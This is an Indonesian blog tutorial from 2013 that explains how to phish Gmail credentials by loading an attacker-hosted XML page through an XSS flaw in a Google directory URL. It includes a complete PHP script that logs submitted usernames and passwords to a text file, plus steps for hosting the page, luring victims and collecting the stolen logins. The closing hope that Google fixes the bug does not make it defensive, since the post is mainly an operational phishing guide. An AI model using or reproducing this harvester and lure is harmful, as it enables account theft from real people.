Sunday, 10 February 2013

0 Memanfaatkan Bug XSS di Google untuk Phishing (Fake Gmail Login)


Tutorial kali ini membuat Fake gmail login dengan memanfaatkan Bug XSS yang ada di situs Google dengan alamat url http://www.google.com/ig/directory?url=

1. Buat coding dengan format XML, seperti ini http://inwepo.com/test/google.xml

2. Buat coding PHP, berikut ini :

<?php
$username = $_POST['username'];
$password = $_POST['password'];
$logs = "save.txt";
$ld = fopen($logs, 'a') or die(" ");
$data = "$username:$password \n";
fwrite($ld, $data);
echo "Sorry this is Phishing!";
?>

Simpan dengan nama save.php

3. Kemudian upload semua script ke hosting kamu.

4. Akses dengan alamat sesuai nama domain kamu contohnya http://www.google.com/ig/directory?url=inwepo.com/test/google.xml

5. Bila ada seseorang yang mencoba login maka username dan password akan otomatis tersimpan di file txt. Akses dengan alamat  http://inwepo.com/test/save.txt

Sekian, semoga Google mau memperbaiki Bug XSS ini :)

0 Comments

Bagaimana Pendapat Anda ?

Find Us on Facebook !